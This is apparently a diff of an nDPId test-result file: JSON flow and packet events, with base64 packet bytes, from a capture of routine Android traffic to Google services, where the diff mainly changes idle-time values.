-00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":367,"source":"android.pcap","alias":"nDPId-test","flow_id":51,"flow_packet_id":1,"flow_last_seen":1582454871741,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1582454871741,"pkt":"xiwDYGpkTGr2n\/YnCABFAAA8FotAAEAGoFXAqAIQrNkUSs0iAbsOnCHhAAAAAKAC\/\/+NXgAAAgQFtAQCCAr\/\/zdqAAAAAAEDAwg="} -00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":368,"source":"android.pcap","alias":"nDPId-test","flow_id":52,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454871745,"flow_last_seen":1582454871745,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1582454871745,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"173.194.79.114","src_port":36848,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":368,"source":"android.pcap","alias":"nDPId-test","flow_id":52,"flow_packet_id":1,"flow_last_seen":1582454871745,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1582454871745,"pkt":"xiwDYGpkTGr2n\/YnCABFAAA8bVhAAEAGDXfAqAIQrcJPco\/wAFDXL1ozAAAAAKAC\/\/+PAwAAAgQFtAQCCAr\/\/zdrAAAAAAEDAwg="} -00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":369,"source":"android.pcap","alias":"nDPId-test","flow_id":53,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454871772,"flow_last_seen":1582454871772,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1582454871772,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"173.194.79.114","src_port":36850,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":369,"source":"android.pcap","alias":"nDPId-test","flow_id":53,"flow_packet_id":1,"flow_last_seen":1582454871772,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1582454871772,"pkt":"xiwDYGpkTGr2n\/YnCABFAAA8CzhAAEAGb5fAqAIQrcJPco\/yAFDC1DxKAAAAAKAC\/\/\/BPgAAAgQFtAQCCAr\/\/zdyAAAAAAEDAwg="} 
-00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":371,"source":"android.pcap","alias":"nDPId-test","flow_id":51,"flow_packet_id":2,"flow_last_seen":1582454871781,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1582454871781,"pkt":"TGr2n\/YnxiwDYGpkCABFAAA8S\/EAAHUGde+s2RRKwKgCEAG7zSLiUVJTDpwh4qAS6yCWYgAAAgQFZAQCCAoTCsRq\/\/83agEDAwg="} -00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":372,"source":"android.pcap","alias":"nDPId-test","flow_id":52,"flow_packet_id":2,"flow_last_seen":1582454871784,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1582454871784,"pkt":"TGr2n\/YnxiwDYGpkCABFAAA8QWIAAGcGUm2twk9ywKgCEABQj\/AL32zY1y9aNKAS87jv8AAAAgQFlgQCCArQ72G\/\/\/83awEDAwg="} -00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":373,"source":"android.pcap","alias":"nDPId-test","flow_id":51,"flow_packet_id":3,"flow_last_seen":1582454871786,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1582454871786,"pkt":"xiwDYGpkTGr2n\/YnCABFAAA0FoxAAEAGoFzAqAIQrNkUSs0iAbsOnCHi4lFSVIAQAVeungAAAQEICv\/\/N3UTCsRq"} -00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":374,"source":"android.pcap","alias":"nDPId-test","flow_id":52,"flow_packet_id":3,"flow_last_seen":1582454871787,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1582454871787,"pkt":"xiwDYGpkTGr2n\/YnCABFAAA0bVlAAEAGDX7AqAIQrcJPco\/wAFDXL1o0C99s2YAQAVcQ9wAAAQEICv\/\/N3bQ72G\/"} 
+00959{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":361,"source":"android.pcap","alias":"nDPId-test","flow_id":49,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1582454871623,"flow_last_seen":1582454871702,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":1935,"flow_avg_l4_payload_len":322,"midstream":0,"thread_ts_msec":1582454871702,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"216.239.38.120","src_port":33002,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"accounts.google.com","ja3":"66918128f1b9b03303d77c6f2eefd128","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":367,"source":"android.pcap","alias":"nDPId-test","flow_id":51,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454871741,"flow_last_seen":1582454871741,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1582454871741,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"172.217.20.74","src_port":52514,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":367,"source":"android.pcap","alias":"nDPId-test","flow_id":51,"flow_packet_id":1,"flow_last_seen":1582454871741,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1582454871741,"pkt":"xiwDYGpkTGr2n\/YnCABFAAA8FotAAEAGoFXAqAIQrNkUSs0iAbsOnCHhAAAAAKAC\/\/+NXgAAAgQFtAQCCAr\/\/zdqAAAAAAEDAwg="} +00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":368,"source":"android.pcap","alias":"nDPId-test","flow_id":52,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454871745,"flow_last_seen":1582454871745,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1582454871745,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"173.194.79.114","src_port":36848,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":368,"source":"android.pcap","alias":"nDPId-test","flow_id":52,"flow_packet_id":1,"flow_last_seen":1582454871745,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1582454871745,"pkt":"xiwDYGpkTGr2n\/YnCABFAAA8bVhAAEAGDXfAqAIQrcJPco\/wAFDXL1ozAAAAAKAC\/\/+PAwAAAgQFtAQCCAr\/\/zdrAAAAAAEDAwg="} 
+00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":369,"source":"android.pcap","alias":"nDPId-test","flow_id":53,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454871772,"flow_last_seen":1582454871772,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1582454871772,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"173.194.79.114","src_port":36850,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":369,"source":"android.pcap","alias":"nDPId-test","flow_id":53,"flow_packet_id":1,"flow_last_seen":1582454871772,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1582454871772,"pkt":"xiwDYGpkTGr2n\/YnCABFAAA8CzhAAEAGb5fAqAIQrcJPco\/yAFDC1DxKAAAAAKAC\/\/\/BPgAAAgQFtAQCCAr\/\/zdyAAAAAAEDAwg="} +00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":371,"source":"android.pcap","alias":"nDPId-test","flow_id":51,"flow_packet_id":2,"flow_last_seen":1582454871781,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1582454871781,"pkt":"TGr2n\/YnxiwDYGpkCABFAAA8S\/EAAHUGde+s2RRKwKgCEAG7zSLiUVJTDpwh4qAS6yCWYgAAAgQFZAQCCAoTCsRq\/\/83agEDAwg="} 
+00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":372,"source":"android.pcap","alias":"nDPId-test","flow_id":52,"flow_packet_id":2,"flow_last_seen":1582454871784,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1582454871784,"pkt":"TGr2n\/YnxiwDYGpkCABFAAA8QWIAAGcGUm2twk9ywKgCEABQj\/AL32zY1y9aNKAS87jv8AAAAgQFlgQCCArQ72G\/\/\/83awEDAwg="} +00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":373,"source":"android.pcap","alias":"nDPId-test","flow_id":51,"flow_packet_id":3,"flow_last_seen":1582454871786,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1582454871786,"pkt":"xiwDYGpkTGr2n\/YnCABFAAA0FoxAAEAGoFzAqAIQrNkUSs0iAbsOnCHi4lFSVIAQAVeungAAAQEICv\/\/N3UTCsRq"} +00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":374,"source":"android.pcap","alias":"nDPId-test","flow_id":52,"flow_packet_id":3,"flow_last_seen":1582454871787,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1582454871787,"pkt":"xiwDYGpkTGr2n\/YnCABFAAA0bVlAAEAGDX7AqAIQrcJPco\/wAFDXL1o0C99s2YAQAVcQ9wAAAQEICv\/\/N3bQ72G\/"} 
00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":377,"source":"android.pcap","alias":"nDPId-test","flow_id":54,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454871804,"flow_last_seen":1582454871804,"flow_idle_time":180000,"flow_min_l4_payload_len":42,"flow_max_l4_payload_len":42,"flow_tot_l4_payload_len":42,"flow_avg_l4_payload_len":42,"midstream":0,"thread_ts_msec":1582454871804,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":18379,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00491{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":377,"source":"android.pcap","alias":"nDPId-test","flow_id":54,"flow_packet_id":1,"flow_last_seen":1582454871804,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":84,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":84,"pkt_l4_len":50,"thread_ts_msec":1582454871804,"pkt":"xiwDYGpkTGr2n\/YnCABFAABGrB5AAEARCSfAqAIQwKgCAUfLADUAMmcLPGQBAAABAAAAAAAACWRhdGFzYXZlcgpnb29nbGVhcGlzA2NvbQAAAQAB"} 00775{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":377,"source":"android.pcap","alias":"nDPId-test","flow_id":54,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454871804,"flow_last_seen":1582454871804,"flow_idle_time":180000,"flow_min_l4_payload_len":42,"flow_max_l4_payload_len":42,"flow_tot_l4_payload_len":42,"flow_avg_l4_payload_len":42,"midstream":0,"thread_ts_msec":1582454871804,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":18379,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.DataSaver","breed":"Fun","category":"Web"},"dns": {"query":"datasaver.googleapis.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 
00517{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":378,"source":"android.pcap","alias":"nDPId-test","flow_id":54,"flow_packet_id":2,"flow_last_seen":1582454871805,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":100,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":100,"pkt_l4_len":66,"thread_ts_msec":1582454871805,"pkt":"TGr2n\/YnxiwDYGpkCABFAABWsEQAAEARRPHAqAIBwKgCEAA1R8sAQmKIPGSBgAABAAEAAAAACWRhdGFzYXZlcgpnb29nbGVhcGlzA2NvbQAAAQABwAwAAQABAAABKwAErNkVyg=="} 00791{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":378,"source":"android.pcap","alias":"nDPId-test","flow_id":54,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1582454871804,"flow_last_seen":1582454871805,"flow_idle_time":180000,"flow_min_l4_payload_len":42,"flow_max_l4_payload_len":58,"flow_tot_l4_payload_len":100,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1582454871805,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":18379,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.DataSaver","breed":"Fun","category":"Web"},"dns": {"query":"datasaver.googleapis.com","num_queries":1,"num_answers":1,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"172.217.21.202"}} -00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":379,"source":"android.pcap","alias":"nDPId-test","flow_id":53,"flow_packet_id":2,"flow_last_seen":1582454871807,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1582454871807,"pkt":"TGr2n\/YnxiwDYGpkCABFAAA8DHkAAGcGh1atwk9ywKgCEABQj\/Jn2o0VwtQ8S6AS87jgEAAAAgQFlgQCCArQTChF\/\/83cgEDAwg="} 
-00471{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":380,"source":"android.pcap","alias":"nDPId-test","flow_id":53,"flow_packet_id":3,"flow_last_seen":1582454871808,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1582454871808,"pkt":"xiwDYGpkTGr2n\/YnCABFAAA0CzlAAEAGb57AqAIQrcJPco\/yAFDC1DxLZ9qNFoAQAVcBGQAAAQEICv\/\/N3vQTChF"} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":381,"source":"android.pcap","alias":"nDPId-test","flow_id":55,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454871814,"flow_last_seen":1582454871814,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1582454871814,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"172.217.21.202","src_port":51944,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":381,"source":"android.pcap","alias":"nDPId-test","flow_id":55,"flow_packet_id":1,"flow_last_seen":1582454871814,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1582454871814,"pkt":"xiwDYGpkTGr2n\/YnCABFAAA8CFFAAEAGrQ\/AqAIQrNkVysroAbtCYT8sAAAAAKAC\/\/889QAAAgQFtAQCCAr\/\/zd9AAAAAAEDAwg="} 
-00889{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":382,"source":"android.pcap","alias":"nDPId-test","flow_id":52,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1582454871745,"flow_last_seen":1582454871818,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":297,"flow_tot_l4_payload_len":297,"flow_avg_l4_payload_len":74,"midstream":0,"thread_ts_msec":1582454871818,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"173.194.79.114","src_port":36848,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.DataSaver","breed":"Fun","category":"Web"},"http": {"hostname":"check.googlezip.net","url":"check.googlezip.net\/connect","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Linux; Android 9; Nokia 2.2) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/79.0.3945.93 Mobile Safari\/537.36"}} +00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":379,"source":"android.pcap","alias":"nDPId-test","flow_id":53,"flow_packet_id":2,"flow_last_seen":1582454871807,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1582454871807,"pkt":"TGr2n\/YnxiwDYGpkCABFAAA8DHkAAGcGh1atwk9ywKgCEABQj\/Jn2o0VwtQ8S6AS87jgEAAAAgQFlgQCCArQTChF\/\/83cgEDAwg="} +00471{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":380,"source":"android.pcap","alias":"nDPId-test","flow_id":53,"flow_packet_id":3,"flow_last_seen":1582454871808,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1582454871808,"pkt":"xiwDYGpkTGr2n\/YnCABFAAA0CzlAAEAGb57AqAIQrcJPco\/yAFDC1DxLZ9qNFoAQAVcBGQAAAQEICv\/\/N3vQTChF"} 
+00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":381,"source":"android.pcap","alias":"nDPId-test","flow_id":55,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454871814,"flow_last_seen":1582454871814,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1582454871814,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"172.217.21.202","src_port":51944,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":381,"source":"android.pcap","alias":"nDPId-test","flow_id":55,"flow_packet_id":1,"flow_last_seen":1582454871814,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1582454871814,"pkt":"xiwDYGpkTGr2n\/YnCABFAAA8CFFAAEAGrQ\/AqAIQrNkVysroAbtCYT8sAAAAAKAC\/\/889QAAAgQFtAQCCAr\/\/zd9AAAAAAEDAwg="} +00889{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":382,"source":"android.pcap","alias":"nDPId-test","flow_id":52,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1582454871745,"flow_last_seen":1582454871818,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":297,"flow_tot_l4_payload_len":297,"flow_avg_l4_payload_len":74,"midstream":0,"thread_ts_msec":1582454871818,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"173.194.79.114","src_port":36848,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.DataSaver","breed":"Fun","category":"Web"},"http": {"hostname":"check.googlezip.net","url":"check.googlezip.net\/connect","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Linux; Android 9; Nokia 2.2) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/79.0.3945.93 Mobile Safari\/537.36"}} 
00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":383,"source":"android.pcap","alias":"nDPId-test","flow_id":56,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454871823,"flow_last_seen":1582454871823,"flow_idle_time":180000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1582454871823,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":10677,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":383,"source":"android.pcap","alias":"nDPId-test","flow_id":56,"flow_packet_id":1,"flow_last_seen":1582454871823,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":79,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":79,"pkt_l4_len":45,"thread_ts_msec":1582454871823,"pkt":"xiwDYGpkTGr2n\/YnCABFAABBrCJAAEARCSjAqAIQwKgCASm1ADUALW7k1fkBAAABAAAAAAAABXByb3h5CWdvb2dsZXppcANuZXQAAAEAAQ=="} 00770{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":383,"source":"android.pcap","alias":"nDPId-test","flow_id":56,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454871823,"flow_last_seen":1582454871823,"flow_idle_time":180000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1582454871823,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":10677,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.DataSaver","breed":"Fun","category":"Web"},"dns": {"query":"proxy.googlezip.net","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 
@@ -273,63 +273,63 @@ 00769{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":385,"source":"android.pcap","alias":"nDPId-test","flow_id":57,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454871827,"flow_last_seen":1582454871827,"flow_idle_time":180000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":32,"flow_tot_l4_payload_len":32,"flow_avg_l4_payload_len":32,"midstream":0,"thread_ts_msec":1582454871827,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":32832,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Google","breed":"Acceptable","category":"Web"},"dns": {"query":"www.google.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00499{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":386,"source":"android.pcap","alias":"nDPId-test","flow_id":57,"flow_packet_id":2,"flow_last_seen":1582454871827,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":90,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":90,"pkt_l4_len":56,"thread_ts_msec":1582454871827,"pkt":"TGr2n\/YnxiwDYGpkCABFAABMd48AAEARfbDAqAIBwKgCEAA1gEAAOLeFcqOBgAABAAEAAAAAA3d3dwZnb29nbGUDY29tAAABAAHADAABAAEAAADaAATY7yZ4"} 00784{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":386,"source":"android.pcap","alias":"nDPId-test","flow_id":57,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1582454871827,"flow_last_seen":1582454871827,"flow_idle_time":180000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":48,"flow_tot_l4_payload_len":80,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1582454871827,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":32832,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Google","breed":"Acceptable","category":"Web"},"dns": 
{"query":"www.google.com","num_queries":1,"num_answers":1,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"216.239.38.120"}} -00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":387,"source":"android.pcap","alias":"nDPId-test","flow_id":58,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454871829,"flow_last_seen":1582454871829,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1582454871829,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"172.217.20.76","src_port":43646,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":387,"source":"android.pcap","alias":"nDPId-test","flow_id":58,"flow_packet_id":1,"flow_last_seen":1582454871829,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1582454871829,"pkt":"xiwDYGpkTGr2n\/YnCABFAAA8SmpAAEAGbHTAqAIQrNkUTKp+Abul3n3qAAAAAKAC\/\/+8ngAAAgQFtAQCCAr\/\/zeAAAAAAAEDAwg="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":389,"source":"android.pcap","alias":"nDPId-test","flow_id":59,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454871839,"flow_last_seen":1582454871839,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1582454871839,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"216.239.38.120","src_port":33014,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
